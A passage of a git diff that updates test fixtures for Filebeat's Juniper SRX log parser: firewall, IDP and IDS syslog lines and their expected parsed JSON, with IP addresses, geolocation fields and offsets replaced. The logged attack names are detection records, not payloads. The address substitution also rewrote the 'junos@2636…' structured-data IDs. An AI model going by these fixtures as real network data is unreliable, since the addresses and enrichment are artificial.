-        "event.original": "source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"8.8.8.8\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"8.8.8.8\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"",
+        "event.original": "source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"175.16.199.1\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"",
         "event.outcome": "success",
         "event.risk_score": 1.0,
         "event.severity": 14,
@@ -1878,7 +1753,7 @@
         "juniper.srx.src_nat_rule_type": "source rule",
         "juniper.srx.tag": "RT_FLOW_SESSION_CREATE",
         "log.level": "informational",
-        "log.offset": 17715,
+        "log.offset": 17863,
         "network.iana_number": "17",
         "observer.egress.zone": "untrust",
         "observer.ingress.interface.name": "ge-0/0/1.0",
@@ -1890,10 +1765,10 @@
         "related.ip": [
             "10.1.1.100",
             "172.19.34.100",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "rule.name": "default-permit",
-        "server.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.port": 53,
         "service.type": "juniper",
@@ -1913,16 +1788,17 @@
         "client.nat.port": 26764,
         "client.packets": 1,
         "client.port": 63381,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 82,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -1935,7 +1811,7 @@
         "event.end": "2020-07-13T14:12:08.530-02:00",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"8.8.8.8\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"8.8.8.8\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"",
+        "event.original": "reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"175.16.199.1\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.start": "2020-07-13T14:12:05.530-02:00",
@@ -1958,7 +1834,7 @@
         "juniper.srx.uplink_rx_bytes": "0",
         "juniper.srx.uplink_tx_bytes": "0",
         "log.level": "informational",
-        "log.offset": 18627,
+        "log.offset": 18789,
         "network.bytes": 148,
         "network.iana_number": "17",
         "network.packets": 2,
@@ -1972,11 +1848,11 @@
         "related.ip": [
             "10.1.1.100",
             "172.19.34.100",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "rule.name": "default-permit",
         "server.bytes": 82,
-        "server.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
diff --git a/x-pack/filebeat/module/juniper/srx/test/idp.log b/x-pack/filebeat/module/juniper/srx/test/idp.log
index c05d9732fb5d..25fa36d89318 100644
--- a/x-pack/filebeat/module/juniper/srx/test/idp.log
+++ b/x-pack/filebeat/module/juniper/srx/test/idp.log
@@ -1,7 +1,7 @@
-<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"]
-<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"]
-<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354" message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.111.1" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.19.13.11" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"]
-<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354" message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.30.11" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.16.1.10" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"]
-<165>1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"]
-<165>1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth1.O" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"]
-<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.1.1.1.2.35 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="193.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="172.30.20.201" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"]
+<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.81.2.69.144.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"]
+<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.81.2.69.144.28 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="187.188.188.10" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="3.3.10.11" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"]
+<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.81.2.69.144.135 epoch-time="1507845354" message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.111.1" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.19.13.11" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"]
+<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.81.2.69.144.135 epoch-time="1507845354" message-type="SIG" source-address="183.78.180.27" source-port="45610" destination-address="118.127.30.11" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.16.1.10" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"]
+<165>1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.81.2.69.144.35 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"]
+<165>1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@2636.81.2.69.144.35 epoch-time="1319419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth1.O" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"]
+<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.81.2.69.144.35 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="193.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="172.30.20.201" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json
index 3254883ceb93..d09fbdca8826 100644
--- a/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/idp.log-expected.json
@@ -142,7 +142,7 @@
         "juniper.srx.threat_severity": "CRITICAL",
         "juniper.srx.type": "idp",
         "log.level": "notification",
-        "log.offset": 929,
+        "log.offset": 933,
         "network.protocol": "TCP",
         "observer.egress.interface.name": "reth2.21",
         "observer.egress.zone": "DMZ",
@@ -231,7 +231,7 @@
         "juniper.srx.tag": "IDP_ATTACK_LOG_EVENT",
         "juniper.srx.threat_severity": "HIGH",
         "log.level": "notification",
-        "log.offset": 1857,
+        "log.offset": 1865,
         "network.protocol": "TCP",
         "observer.egress.interface.name": "reth1.1",
         "observer.egress.zone": "dst-sec-zone1-outside",
@@ -316,7 +316,7 @@
         "juniper.srx.tag": "IDP_ATTACK_LOG_EVENT",
         "juniper.srx.threat_severity": "HIGH",
         "log.level": "notification",
-        "log.offset": 2773,
+        "log.offset": 2785,
         "network.protocol": "TCP",
         "observer.egress.interface.name": "reth1.1",
         "observer.egress.zone": "dst-sec-zone1-outside",
@@ -382,7 +382,7 @@
         "juniper.srx.service_name": "HTTP",
         "juniper.srx.tag": "IDP_APPDDOS_APP_STATE_EVENT",
         "log.level": "notification",
-        "log.offset": 3693,
+        "log.offset": 3709,
         "message": "Connection rate exceeded limit 60",
         "network.protocol": "TCP",
         "observer.egress.interface.name": "reth0.0",
@@ -447,7 +447,7 @@
         "juniper.srx.time_period": "60",
         "juniper.srx.time_scope": "PEER",
         "log.level": "notification",
-        "log.offset": 4165,
+        "log.offset": 4185,
         "network.protocol": "TCP",
         "observer.egress.interface.name": "reth0.0",
         "observer.egress.zone": "untrust",
@@ -515,7 +515,7 @@
         "juniper.srx.time_period": "60",
         "juniper.srx.time_scope": "PEER",
         "log.level": "notification",
-        "log.offset": 4895,
+        "log.offset": 4919,
         "network.protocol": "TCP",
         "observer.egress.interface.name": "reth0.1",
         "observer.egress.zone": "untrust",
diff --git a/x-pack/filebeat/module/juniper/srx/test/ids.log b/x-pack/filebeat/module/juniper/srx/test/ids.log
index 5b87817da868..21e229c792ab 100644
--- a/x-pack/filebeat/module/juniper/srx/test/ids.log
+++ b/x-pack/filebeat/module/juniper/srx/test/ids.log
@@ -1,12 +1,12 @@
-<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.137 attack-name="TCP sweep!" source-address="113.113.17.17" source-port="6000" destination-address="40.177.177.1" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
-<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.36 attack-name="WinNuke attack!" source-address="2000:0000:0000:0000:0000:0000:0000:0002" source-port="3240" destination-address="2001:0000:0000:0000:0000:0000:0000:0002" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
-<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" source-address="1.1.1.2" source-port="40001" destination-address="2.2.2.2" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.1.1.1.2.40 attack-name="UDP flood!" source-address="111.1.1.3" source-port="40001" destination-address="3.4.2.2" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.1.1.1.2.40 attack-name="ICMP fragment!" source-address="111.1.1.3" destination-address="3.4.2.2" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Record Route IP option!" source-address="111.1.1.3" destination-address="3.4.2.2" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Tunnel GRE 6in6!" source-address="1212::12" destination-address="1111::11" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.1.1.1.2.40 attack-name="Tunnel GRE 4in4!" source-address="12.12.12.1" destination-address="11.11.11.1" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" destination-address="2.2.2.2" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
-<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.1.1.1.2.40 attack-name="SYN flood!" source-address="111.1.1.3" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
-<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name="TCP port scan!" source-address="10.1.1.100" source-port="50630" destination-address="10.1.1.1" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
-<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.1.1.1.2.129 attack-name="FIN but no ACK bit!" source-address="10.1.1.100" source-port="42799" destination-address="10.1.1.1" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.144.137 attack-name="TCP sweep!" source-address="89.160.20.112" source-port="6000" destination-address="40.177.177.1" destination-port="1433" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
+<11>1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.144.36 attack-name="WinNuke attack!" source-address="2000:0000:0000:0000:0000:0000:0000:0002" source-port="3240" destination-address="2001:0000:0000:0000:0000:0000:0000:0002" destination-port="139" source-zone-name="untrust" interface-name="fe-0/0/2.0" action="drop"]
+<11>1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.144.40 attack-name="SYN flood!" source-address="81.2.69.144" source-port="40001" destination-address="2.2.2.2" destination-port="50010" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@2636.81.2.69.144.40 attack-name="UDP flood!" source-address="81.2.69.143" source-port="40001" destination-address="3.4.2.2" destination-port="53" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@2636.81.2.69.144.40 attack-name="ICMP fragment!" source-address="81.2.69.143" destination-address="3.4.2.2" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.144.40 attack-name="Record Route IP option!" source-address="81.2.69.143" destination-address="3.4.2.2" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.144.40 attack-name="Tunnel GRE 6in6!" source-address="1212::12" destination-address="1111::11" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@2636.81.2.69.144.40 attack-name="Tunnel GRE 4in4!" source-address="81.2.69.145" destination-address="11.11.11.1" protocol-id="1" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@2636.81.2.69.144.40 attack-name="SYN flood!" destination-address="2.2.2.2" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
+<11>1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@2636.81.2.69.144.40 attack-name="SYN flood!" source-address="81.2.69.143" source-zone-name="trustZone" interface-name="ge-0/0/1.0" action="alarm-without-drop"]
+<11>1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.144.129 attack-name="TCP port scan!" source-address="10.1.1.100" source-port="50630" destination-address="10.1.1.1" destination-port="10778" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
+<11>1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@2636.81.2.69.144.129 attack-name="FIN but no ACK bit!" source-address="10.1.1.100" source-port="42799" destination-address="10.1.1.1" destination-port="7" source-zone-name="trust" interface-name="ge-0/0/1.0" action="drop"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/ids.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/ids.log-expected.json
index b0be8ce71089..86a8f2d10831 100644
--- a/x-pack/filebeat/module/juniper/srx/test/ids.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/ids.log-expected.json
@@ -1,15 +1,8 @@
 [
     {
         "@timestamp": "2018-07-19T21:17:02.309-02:00",
-        "client.ip": "113.113.17.17",
+        "client.ip": "89.160.20.112",
         "client.port": 6000,
-        "destination.as.number": 4249,
-        "destination.as.organization.name": "Eli Lilly and Company",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "40.177.177.1",
         "destination.port": 1433,
         "event.action": "sweep_detected",
@@ -20,7 +13,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "alert",
         "event.module": "juniper",
-        "event.original": "attack-name=\"TCP sweep!\" source-address=\"113.113.17.17\" source-port=\"6000\" destination-address=\"40.177.177.1\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"",
+        "event.original": "attack-name=\"TCP sweep!\" source-address=\"89.160.20.112\" source-port=\"6000\" destination-address=\"40.177.177.1\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"",
         "event.outcome": "success",
         "event.severity": 11,
         "event.timezone": "-02:00",
@@ -44,22 +37,23 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "113.113.17.17",
-            "40.177.177.1"
+            "40.177.177.1",
+            "89.160.20.112"
         ],
         "server.ip": "40.177.177.1",
         "server.port": 1433,
         "service.type": "juniper",
-        "source.as.number": 4134,
-        "source.as.organization.name": "No.31,Jin-rong Street",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 23.1167,
-        "source.geo.location.lon": 113.25,
-        "source.geo.region_iso_code": "CN-GD",
-        "source.geo.region_name": "Guangdong",
-        "source.ip": "113.113.17.17",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
